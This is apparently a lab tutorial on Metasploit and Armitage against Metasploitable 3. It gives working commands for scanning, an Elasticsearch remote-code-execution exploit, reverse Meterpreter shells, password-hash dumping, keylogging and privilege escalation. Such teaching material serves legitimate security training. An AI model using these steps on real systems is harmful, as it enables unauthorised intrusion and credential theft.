Metasploit and Armitage
Starting Metasploit
Generic Metasploit installation instructions for any OS:
https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework
Instructions for starting Metasploit in Kali:
https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
The default install of Metasploit that comes with Kali needs to be initialized.
service postgresql start msfdb init # only if necessary
Starting msfconsole
msfconsole
Once msfconsole is running:
msf>db_status # check database status # if there's a db problem, like running slow, try: msf>help msf>db_rebuild_cache # note this command in help # now searches like: msf>search ftp # will be much faster
Database credentials are stored in this file:
/opt/metasploit/apps/pro/ui/config/database.yml
Metasploit Modules
In a separate Bash window, go to the Metasploit folder.
cd /usr/share/metasploit-framework ls
Note the Modules directory.
cd modules ls
See the five different types of modules (folder names).
cd exploits ls
The folders inside exploits/ are named for operating systems. Change to windows/smb (look around as you go).
cd windows ls cd smb ls
Search for a Module
In the msfconsole window, use search:
msf> search psexec # note that we don't use the file extension .rb
Copy the path to that exploit.
msf> use exploit/windows/smb/psexec #again, no .rb extension.
Your location (context) changes (note the command prompt). While you’re in the smb/ folder, use the info command for details.
msf exploit(psexec) > info
You can look at the module contents in back in Bash using less (or more or cat):
less psexec.rb
Look carefully at variables in particular. Close less.
Use back whenever you need to go back to the home directory. But don’t do that just yet.
msf> back
The msfconsole supports tab completion, so typing “aux” then Tab will complete “auxiliary”.
msf > use aux<Tab> #aux automatically expands to auxiliary
Workspaces
A workspace keeps one project’s data separate from another’s. See this article on workspaces:
https://www.ceos3c.com/hacking/metasploit-how-to-use-workspaces-and/. (Yes the URL ends that way; CMSs can generate some funny links.)
Check the syntax, list your workspaces and create a workspace:
msf exploit(psexec) > workspace --help msf exploit(psexec) > workspace # show all workspaces msf exploit(psexec) > workspace -a ms3 # create a workspace
When you create a workspace you automatically change to it. You can change workspaces like this, but don’t do it yet:
msf > workspace default
Instead, while you’re in your new workspace, run the hosts command:
msf > hosts
You won’t have any listed yet, but now you know how to see the ones you find. While you’re at it try the services command, and the help command to see a list of Database Backend Commands and tables.
msf > services
msf > help
Scanning
–>See Hacking Metasploitable 3: Discovering Remote Services with NMap at https://www.youtube.com/watch?v=sHS4kHKcQhc .
Perform a preliminary scan of the target within msfconsole. You could run nmap directly inside the msfconsole, but using db_nmap command enters the scan results into the Metasploit database.
msf > db_nmap -sn -n -v --exclude 192.168.0.10 192.168.0.1-100
… where 192.168.0.10 is your own IP address.
-sn # arp ping scan only; this will work when ICMP ping won’t!
-n # don’t bother doing any DNS lookups
-v # verbose can you say it more words yes more words
–exclude # please exclude me
1-100 # because we don’t want to be too stinkeen noisy
See your results with hosts command.
msf > hosts
We could do a fast (-F) scan of just the top 100 ports:
db_nmap -F -sS -n -v --reason --open 192.168.0.25
… assuming 192.168.0.25 is the target you’ve found.
-F # only 100 ports
-sS # SYN scan of cource
-n # remember no DNS
–reason # only show result lines for a reason
–open # that reason is: they’re open
Run the services command:
msf > services
Now you can see target services. Investigate each for vulnerabilities/exploits. In Metasploitable 3, the Elasticsearch service is a target:
msf exploit(psexec) > search Elasticsearch
You’ll get a list of possible modules. Research and select one.
msf exploit(psexec) > use exploit/multi/elasticsearch/script_mvel_rce msf exploit(script_mvel_rce) > show options msf exploit(script_mvel_rce) > set RHOST 192.168.0.25 # sets value msf exploit(script_mvel_rce) > set RHOST # shows value msf exploit(script_mvel_rce) > show advanced # lists advanced variables
You can set a global variable (within this msf session):
msf exploit(script_mvel_rce) > setg RHOST 192.168.0.197
Set will override setg if used inside a particular module.
Once you’ve set the necessary vars, you can run the exploit command:
msf exploit(script_mvel_rce) > exploit
The resulting messages are tagged by color. Red indicates an error. Depending on the exploit, you may get a Meterpreter shell.
Post-exploit
Now we need to run post-exploit commands. Check them out in Bash:
cd ../../post/ ls cd windows/ ls
Subfolders are named for the action they’ll take.
Back in msf:
meterpreter > run post/windows/manage/<TAB> # to see candidate post modules meterpreter > run post/windows/manage/
Background meterpreter to got back to msf:
meterpreter > background msf exploit(script_mvel_rce) >
Payloads
Look at payloads:
msf exploit(script_mvel_rce) > show # shows payload types msf exploit(script_mvel_rce) > show payloads # note plural lowercase msf exploit(script_mvel_rce) > show <TAB> <TAB> # for a list
Set the payload. A Meterpreter shell is generally the best, but it may conflict with IDS.
msf exploit(script_mvel_rce) > set PAYLOAD java/meterpreter/reverse-http msf exploit(script_mvel_rce) > run
Upgrading from cmd.exe to a Meterpreter Session
Let’s do this as a walk-through. Our victim is 192.168.0.25, and we are 192.168.0.10.
If you’d like to see this as a video, go to:
https://www.youtube.com/watch?v=LRS05gvcvdk
1. In Terminal 1 (Bash), ping and scan:
fping 192.168.0.25 nmap -sS -sV -T4 192.168.0.25
2. Open Terminal 2 and fire up msfconsole:
cd /pentests/exploits/framework3 msfconsole
3. Start a handler:
msf > use multi/handler msf > set payload windows/shell_bind_TCP
4. Configure:
msf > show options msf > set RHOST 192.168.0.25
5. Exploit:
msf > exploit
Bang: if everything works you get a Windows cmd shell.
Use Ctl-Z to background this session. Confirm Yes.
Back in msfconsole, confirm we have a session on the Windows box:
msf > sessions -l # that's an ell
View options:
msf > sessions -h ?
Note the -u option.
It might be a good time to set options globally:
msf > setg LHOST 192.168.0.10 # me msf > setg RHOST 192.168.0.25 # target
Now upgrade that shell in session 1:
msf > sessions -u 1
You’ll eventually get a message: session 2 opened.
Confirm the session exists by listing again:
msf > sessions -l # that's an ell
Now go to that session:
msf > sessions -i 2
Boom! You’re in the remote Meterpreter!
msf > sysinfo msf > hashdump msf > screenshot msf > keyscan_start
Ha ha, open Notepad in the Windows victim and write yourself a little note:
Roses are red,
Violets are blue,
All of my base
BELONG TO YOU!
Back in Meterpreter, run:
msf > keyscan dump
… and see the nice little message to yourself. You’re a poet.
Try the most elementary privilege escalation:
msf > getsystem
If this works you’re huge and golden: the SYSTEM user.
Armitage
Wish you had Metasploit Pro? Try using Armitage on top of Metasploit, and get most of the Pro features.
https://www.binarytides.com/run-metasploit-armitage-kali/
Start Armitage:
armitage